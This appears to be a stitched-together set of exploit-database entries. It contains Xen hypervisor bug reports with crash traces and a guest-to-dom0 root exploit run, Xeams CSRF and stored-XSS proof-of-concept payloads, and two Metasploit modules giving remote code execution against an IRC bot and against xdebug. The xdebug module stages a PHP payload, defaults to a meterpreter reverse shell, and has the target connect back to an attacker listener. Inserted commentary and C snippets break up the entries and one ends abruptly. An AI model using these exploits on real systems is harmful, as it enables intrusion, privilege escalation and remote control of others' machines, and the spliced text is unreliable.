(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN)    [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d0801768e9>] is_iomem_page+0x9/0x70
(XEN)    [<ffff82d08010baec>] grant_table.c#__gnttab_unmap_common_complete+0x17c/0x360
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080146684>] serial_tx_interrupt+0xe4/0x120
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017234a>] do_IRQ+0x22a/0x660
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080237f6f>] common_interrupt+0x5f/0x70
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d08017a028>] put_page_from_l1e+0xb8/0x130
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d08017a28a>] mm.c#put_page_from_l2e+0x7a/0x190
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN)    [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN)    [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN)    [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN)    [<ffff82d0801791e3>] get_page+0x13/0xf0
(XEN)    [<ffff82d080183056>] do_mmuext_op+0x1056/0x1500
(XEN)    [<ffff82d080182000>] do_mmuext_op+0/0x1500
(XEN)    [<ffff82d080169c96>] pv_hypercall+0xf6/0x1c0
(XEN)    [<ffff82d08019bea3>] do_page_fault+0x163/0x4c0
(XEN)    [<ffff82d080237abe>] entry.o#test_all_events+0/0x2a
(XEN) 
(XEN) 
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN) 
(XEN) Reboot in five seconds...
==============================

This PoC just causes a DoS, but as far as I can tell, Xen only uses
guard pages for the stack (via memguard_guard_stack()) in debug builds,
which would mean that this is a potentially exploitable issue in release builds.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43014.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184

This bug report describes a vulnerability in memory_exchange() that
permits PV guest kernels to write to an arbitrary virtual address with
hypervisor privileges. The vulnerability was introduced through a
broken fix for CVE-2012-5513 / XSA-29.

The fix for CVE-2012-5513 / XSA-29 introduced the following check in
the memory_exchange() hypercall handler:

    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
    {
        rc = -EFAULT;
        goto fail_early;
    }

guest_handle_okay() calls array_access_ok(), which calls access_ok(),
which is implemented as follows:

    /*
     * Valid if in +ve half of 48-bit address space, or above
     * Xen-reserved area.
     * This is also valid for range checks (addr, addr+size). As long
     * as the start address is outside the Xen-reserved area then we
     * will access a non-canonical address (and thus fault) before
     * ever reaching VIRT_START.
     */
    #define __addr_ok(addr) \
        (((unsigned long)(addr) < (1UL<<47)) || \
         ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

    #define access_ok(addr, size) \
        (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

As the comment states, access_ok() only checks the address, not the
size, if the address points to guest memory, based on the assumption
that any caller of access_ok() will access guest memory linearly,
starting at the supplied address. Callers that want to access a
subrange of the memory referenced by a guest handle are supposed to
use guest_handle_subrange_okay(), which takes an additional start
offset parameter, instead of guest_handle_okay().

memory_exchange() uses guest_handle_okay(), but only accesses the
guest memory arrays referenced by exch.in.extent_start and
exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset.
The intent behind exch.nr_exchanged is that guests always set it to 0
and nonzero values are only set when a hypercall has to be restarted
because of preemption, but this isn't enforced.

Therefore, by invoking this hypercall with crafted arguments, it is
possible to write to an arbitrary memory location that is encoded as

    exch.out.extent_start + 8 * exch.nr_exchanged

where exch.out.extent_start points to guest memory and
exch.nr_exchanged is an attacker-chosen 64-bit value.
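
To make the range problem concrete, here is an added model in C. It is not Xen's code: the HYPERVISOR_VIRT_END and Xen text-base constants are assumed from the x86-64 layout (consistent with the ffff82d0... addresses in the dumps above), and the guest buffer and target addresses are constructed. It reproduces the start-address-only check quoted from the report, shows an exch.nr_exchanged value that makes the slot actually written wrap around 2^64 into the hypervisor range while that check still passes, and contrasts it with a guest_handle_subrange_okay-style check that validates the window really dereferenced and a range-aware access_ok() of the kind the report recommends.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed from Xen's x86-64 layout: the end of the Xen-reserved virtual
 * range (64-bit PV guest kernel mappings live above it) and the base of
 * Xen's own text. Both are assumptions for this model. */
#define HYPERVISOR_VIRT_END UINT64_C(0xffff880000000000)
#define XEN_TEXT_BASE       UINT64_C(0xffff82d080000000)
#define USER_LIMIT          (UINT64_C(1) << 47)

/* __addr_ok() as quoted in the report: only the start address is examined. */
bool addr_ok(uint64_t addr) {
    return addr < USER_LIMIT || addr >= HYPERVISOR_VIRT_END;
}

/* access_ok() as quoted: the size is ignored for guest addresses.
 * The compat-xlat branch is left out of this model. */
bool access_ok_original(uint64_t addr, uint64_t size) {
    (void)size;
    return addr_ok(addr);
}

/* The slot memory_exchange() actually touches for entry nr_exchanged of a
 * 64-bit extent array; the addition wraps modulo 2^64 like the hardware. */
uint64_t extent_slot(uint64_t extent_start, uint64_t nr_exchanged) {
    return extent_start + 8 * nr_exchanged;
}

/* Attacker's arithmetic: an nr_exchanged that makes extent_slot() land on
 * target. Requires (target - extent_start) to be a multiple of 8. */
uint64_t pick_nr_exchanged(uint64_t extent_start, uint64_t target) {
    return (target - extent_start) / 8;
}

/* Range-aware check in the spirit of the report's recommendation: every
 * byte of [addr, addr+size) must lie in one permitted region, with no wrap. */
bool access_ok_range(uint64_t addr, uint64_t size) {
    if (size == 0) return true;
    uint64_t last = addr + size - 1;
    if (last < addr) return false;            /* wrapped around 2^64 */
    return last < USER_LIMIT || addr >= HYPERVISOR_VIRT_END;
}

/* guest_handle_subrange_okay-style check: validate the elements that will
 * be dereferenced, [first, last], not the array from index 0. */
bool subrange_ok(uint64_t extent_start, uint64_t first, uint64_t last) {
    if (last < first) return false;
    uint64_t count = last - first + 1;
    if (first > UINT64_MAX / 8 || count > UINT64_MAX / 8) return false;
    return access_ok_range(extent_slot(extent_start, first), count * 8);
}

int main(void) {
    uint64_t guest_buf = HYPERVISOR_VIRT_END + 0x1000;  /* constructed guest-kernel address */
    uint64_t target    = XEN_TEXT_BASE + 0x22a3d0;      /* constructed address inside Xen */
    uint64_t n = pick_nr_exchanged(guest_buf, target);

    printf("access_ok(extent_start)          : %s\n",
           access_ok_original(guest_buf, 8) ? "ok" : "rejected");
    printf("nr_exchanged chosen              : %" PRIu64 "\n", n);
    printf("slot actually written            : 0x%" PRIx64 " (in hypervisor range: %s)\n",
           extent_slot(guest_buf, n), addr_ok(extent_slot(guest_buf, n)) ? "no" : "yes");
    printf("subrange_ok(first = nr_exchanged): %s\n",
           subrange_ok(guest_buf, n, n) ? "ok" : "rejected");
    return 0;
}
```

The original check accepts the guest buffer because its start lies above HYPERVISOR_VIRT_END, yet the element written sits in Xen's own range. Checking the address of the first element actually accessed catches it, because the wrapped address fails __addr_ok(); the separate overflow guards on first and count stop the multiplication itself from wrapping.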


I have attached a proof of concept. This PoC demonstrates the issue by
overwriting the first 8 bytes of the IDT entry for #PF, causing the
next page fault to double fault. To run the PoC, unpack it in a normal
64-bit PV domain and run the following commands in the domain as root:

root@pv-guest:~# cd crashpoc
root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd)
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/crashpoc/built-in.o
  CC [M]  /root/crashpoc/module.o
nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm
  LD [M]  /root/crashpoc/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o
  CC      /root/crashpoc/test.mod.o
  LD [M]  /root/crashpoc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/crashpoc# insmod test.ko
root@pv-guest:~/crashpoc# rmmod test

The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4
(from Ubuntu 16.04.2). Executing the PoC caused the following console
output:

(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.6.0  x86_64  debug=n  Tainted:    C ]----
(XEN) CPU:    0
(XEN) RIP:    e033:[<0000557b46f56860>] 0000557b46f56860
(XEN) RFLAGS: 0000000000010202   CONTEXT: hypervisor
(XEN) rax: 00007fffe9cfafd0   rbx: 00007fffe9cfd160   rcx: 0000557b47ebd040
(XEN) rdx: 0000000000000001   rsi: 0000000000000004   rdi: 0000557b47ec52e0
(XEN) rbp: 00007fffe9cfd158   rsp: 00007fffe9cfaf30   r8:  0000557b46f7df00
(XEN) r9:  0000557b46f7dec0   r10: 0000557b46f7df00   r11: 0000557b47ec5878
(XEN) r12: 0000557b47ebd040   r13: 00007fffe9cfb0c0   r14: 0000557b47ec52e0
(XEN) r15: 0000557b47ed5e70   cr0: 0000000080050033   cr4: 00000000001506a0
(XEN) cr3: 0000000098e2e000   cr2: 00007fffe9cfaf93
(XEN) ds: 0000   es: 0000   fs: 0000   gs: 0000   ss: e02b   cs: e033
(XEN) 
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN) 
(XEN) Reboot in five seconds...


I strongly recommend changing the semantics of access_ok() so that it
guarantees that any access to an address inside the specified range is
valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of
access_ok() and appropriate wrappers to prevent people from using
these functions improperly. Currently, in my opinion, the function
name access_ok() is misleading.

Proof of Concept: xen_memory_exchange_crashpoc.tar 

################################################################################

I have written an exploit (attached).

Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump):


root@pv-guest:~/privesc_poc# ./compile.sh 
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
  LD      /root/privesc_poc/built-in.o
  CC [M]  /root/privesc_poc/module.o
nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm
  LD [M]  /root/privesc_poc/test.o
  Building modules, stage 2.
  MODPOST 1 modules
WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o
  CC      /root/privesc_poc/test.mod.o
  LD [M]  /root/privesc_poc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest'                                                                                       
press enter to continue
<press enter>
root@pv-guest:~/privesc_poc#  


dmesg in the unprivileged PV guest:


[  721.413415] call_int_85 at 0xffffffffc0075a90
[  721.420167] backstop_85_handler at 0xffffffffc0075a93
[  722.801566] PML4 at ffff880002fe3000
[  722.808216] PML4 entry: 0x13bba4067
[  722.816161] ### trying to write crafted PUD entry...
[  722.824178] ### writing byte 0
[  722.832193] write_byte_hyper(ffff88007a491008, 0x7)
[  722.840254] write_byte_hyper successful
[  722.848234] ### writing byte 1
[  722.856170] write_byte_hyper(ffff88007a491009, 0x80)
[  722.864219] write_byte_hyper successful
[  722.872241] ### writing byte 2
[  722.880215] write_byte_hyper(ffff88007a49100a, 0x35)
[  722.889014] write_byte_hyper successful
[  722.896232] ### writing byte 3
[  722.904265] write_byte_hyper(ffff88007a49100b, 0x6)
[  722.912599] write_byte_hyper successful
[  722.920246] ### writing byte 4
[  722.928270] write_byte_hyper(ffff88007a49100c, 0x0)
[  722.938554] write_byte_hyper successful
[  722.944231] ### writing byte 5
[  722.952239] write_byte_hyper(ffff88007a49100d, 0x0)
[  722.961769] write_byte_hyper successful
[  722.968221] ### writing byte 6
[  722.976219] write_byte_hyper(ffff88007a49100e, 0x0)
[  722.984319] write_byte_hyper successful
[  722.992233] ### writing byte 7
[  723.000234] write_byte_hyper(ffff88007a49100f, 0x0)
[  723.008341] write_byte_hyper successful
[  723.016254] ### writing byte 8
[  723.024357] write_byte_hyper(ffff88007a491010, 0x0)
[  723.032254] write_byte_hyper successful
[  723.040236] ### crafted PUD entry written
[  723.048199] dummy
[  723.056199] going to link PMD into target PUD
[  723.064238] linked PMD into target PUD
[  723.072206] going to unlink mapping via userspace PUD
[  723.080230] mapping unlink done
[  723.088251] copying HV and user shellcode...
[  723.096283] copied HV and user shellcode
[  723.104270] int 0x85 returned 0x7331
[  723.112237]   remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800
[  723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800
[  723.128226] remapped IDT entry for 0x80 to 0xffff804000100800
[  723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15
[  723.144291] int 0x85 returned 0x1337
[  723.152235] === END ===


The supplied shell command executes in dom0 (and all other 64-bit PV domains):


root@ubuntu:~# cat /tmp/owned_by_the_guest 
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# 


Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor.


I have tested the exploit in the following configurations:

configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu

configuration 2:
running on a physical machine with Qubes OS 3.1 installed
Xen version 4.6.3

Proof of Concept: privesc_poc.tar.gz 

################################################################################

Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip
            
# Exploit Title: Multiple vulnerabilities in Xeams 4.5 Build 5755 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact: marlowtannhauser@gmail.com
# Vendor Homepage: http://www.synametrics.com
# Software Link: http://web.synametrics.com/XeamsDownload.htm
# Version: 4.5 Build 5755. Earlier versions may also be affected.
# CVE: 2015-3141 (Xeams)
# Category: Web apps


# DISCLOSURE TIMELINE #
08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure

Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. Note also that this is a different vulnerability from CVE-2012-2569.


# EXPLOIT DESCRIPTION #
Xeams 4.5 Build 5755 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.


# POC 1 #
The following PoC uses the CSRF vulnerability to create a new SMTP domain in the application, and combines it with one of the stored XSS vulnerabilities.

<html>
<img src="http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&operation=160" alt="" width="1" height="1">
</html>


# POC 2 #
The following PoC uses the CSRF vulnerability to create a new user with the details shown.

<html>
<img src="http://192.168.1.67:5272/FrontController?txtEmail=marlow@marlow.com&txtPwd=marlow&txtPwd1=marlow&chkActivate=on&chkNotify=on&reportTime_0=0&reportTime_1=- 1&reportTime_2=- 1&reportTime_3=- 1&reportTime_4=- 1&chkServerHost=192.168.1.67&SaveAndClose=Save&operation=504" alt="" width="1" height="1">
</html>


# STORED XSS VULNERABILITIES #
Stored XSS vulnerabilities are present in the following fields:

Server Configuration > SMTP Configuration > Domain Configuration > New domain name field
Example URL: http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22ONE%22%29%3C%2Fscript%3E&operation=160#tab2

Server Configuration > Manage Forwarders > Add a new forwarder > Recipient's address
Example URL: http://192.168.0.8:5272/FrontController?txtRecipient=%3Cscript%3Ealert%28%22THREE%22%29%3C%2Fscript%3E&txtIPAddress=127.0.0.1&chkGoodOnly=on&operation=130

Server Configuration > Manage POP3 Fetcher > New Account > POP3 Server field, User Name field, and Recipient field
Example URL: http://192.168.0.8:5272/FrontController?popFetchServer=%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&popFetchUser=%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&popFetchPwd=password&popFetchRecipient=%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&popFetchCount=0&operation=73&index=-1

Server Configuration > Server Configuration > Advanced Configuration > Smtp HELO domain [XSS is displayed in Tools > About Xeams]
Example URL: none (this field is submitted in a POST request)


# MITIGATION #
Upgrade to the latest build of Xeams, available from the link shown.
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
      'Description'    => %q{
          This module allows remote command execution on an IRC Bot developed by xdh.
          This perl bot was caught by Conor Patrick with his shellshock honeypot server
          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
          Thayer also found this script which has a description of LinuxNet perlbot.

          The bot only answers when the server name and nickname in the IRC message
          match the ones configured in the perl script, so to exploit it you need to be
          an operator on the IRC network (to spoof them) or at least to connect from the
          IP address that the bot's configuration expects.
        },
      'Author'         =>
        [
          #MalwareMustDie
          'Jay Turla', # msf
          'Conor Patrick', # initial discovery and botnet analysis for xdh
          'Matt Thayer' # initial discovery for LinuxNet perlbot
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
          [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
          [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'  =>
        [
          [ 'xdh Botnet / LinuxNet perlbot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 04 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  def check
    connect

    res = register(sock)
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport}  - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    if res !~ /353/ && res !~ /366/ # '!res =~ /x/' parses as '(!res) =~ /x/' and never matches
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    data
  end

  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock,msg)
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  def xdh_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    if res !~ /353/ && res !~ /366/ # '!res =~ /x/' parses as '(!res) =~ /x/' and never matches
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    xdh_command(sock)

    quit(sock)
    disconnect
  end

end
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'xdebug Unauthenticated OS Command Execution',
      'Description' => %q{
       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
       This allows the attacker to execute arbitrary php code as the context of the web user.
      },
      'DisclosureDate' => 'Sep 17 2017',
      'Author' => [
        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
        'Shaksham Jaiswal', # MinatoTW
        'Mumbai' # Austin Hudson
      ],
      'References' => [
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
        ['URL', 'https://paper.seebug.org/397/']
      ],
      'License' => MSF_LICENSE,
      'Platform' => 'php',
      'Arch' => [ARCH_PHP],
      'DefaultTarget' => 0,
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))

    register_options([
        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
        Opt::RPORT(80),
        OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
    ])
  end

  def check
    begin
      # Asking for a debug session makes xdebug announce itself in a response header.
      res = send_request_cgi({
        'uri' => datastore["PATH"],
        'method' => 'GET',
        'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
        }
      })
      vprint_status("Request sent\n#{res.headers}") if res # res is nil when no response came back
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    rescue Rex::ConnectionError
      return CheckCode::Unknown
    end
  end

  def exploit
    # Stage the PHP payload in a file under WriteableDir and have the target's
    # php binary run it. DBGp requires the data after '--' to be base64 and
    # the command to be NUL-terminated.
    payl = Rex::Text.encode_base64(payload.encoded)
    file = "#{datastore['WriteableDir']}/#{rand_text_alphanumeric(5)}"
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"

    # Listener for the DBGp connection that xdebug opens back to us.
    webserver = Thread.new do
      begin
        server = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['SRVPORT'],
          'LocalHost' => datastore['SRVHOST'],
          'Context' => {
            'Msf' => framework,
            'MsfExploit' => self
          })

        client = server.accept
        print_status("Waiting for client response.")
        data = client.recv(1024) # xdebug's <init> packet
        print_status("Receiving response")
        vprint_line(data)
        print_status("Shell might take up to a minute to respond. Please be patient.")
        print_status("Sending payload of size #{cmd1.length} bytes")
        register_file_for_cleanup(file)
        client.write(cmd1)
        client.close
        server.close
        webserver.exit
      ensure
        webserver.exit
      end
    end

    # Trigger: with xdebug.remote_connect_back enabled, xdebug connects to the
    # address given in X-Forwarded-For, so LHOST must be reachable from the target.
    send_request_cgi({
      'uri' => datastore['PATH'],
      'method' => 'GET',
      'headers' => {
        'X-Forwarded-For' => "#{lhost}",
        'Cookie' => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)
      }
    })
  end
end
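
As an added example, not part of the module above or of the xdebug project, here is the DBGp framing the listener thread in exploit() relies on, written in C. Once xdebug connects back it sends an init packet framed as "<decimal length>\0<xml>\0"; the IDE side replies with NUL-terminated commands whose data after "--" is base64-encoded, which is why cmd1 above ends in "\x00". The init XML and the PHP snippet passed to eval are constructed for this example; a real engine sends its own values.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Engine -> IDE frame: "<decimal length>\0<xml>\0". Writes into out and
 * returns the number of bytes produced, or 0 if out is too small. */
size_t dbgp_build_frame(const char *xml, char *out, size_t outsz) {
    size_t xml_len = strlen(xml);
    int n = snprintf(out, outsz, "%zu", xml_len);
    if (n < 0 || (size_t)n + 1 + xml_len + 1 > outsz) return 0;
    memcpy(out + n + 1, xml, xml_len);        /* snprintf already placed the first NUL */
    out[n + 1 + xml_len] = '\0';
    return (size_t)n + 1 + xml_len + 1;
}

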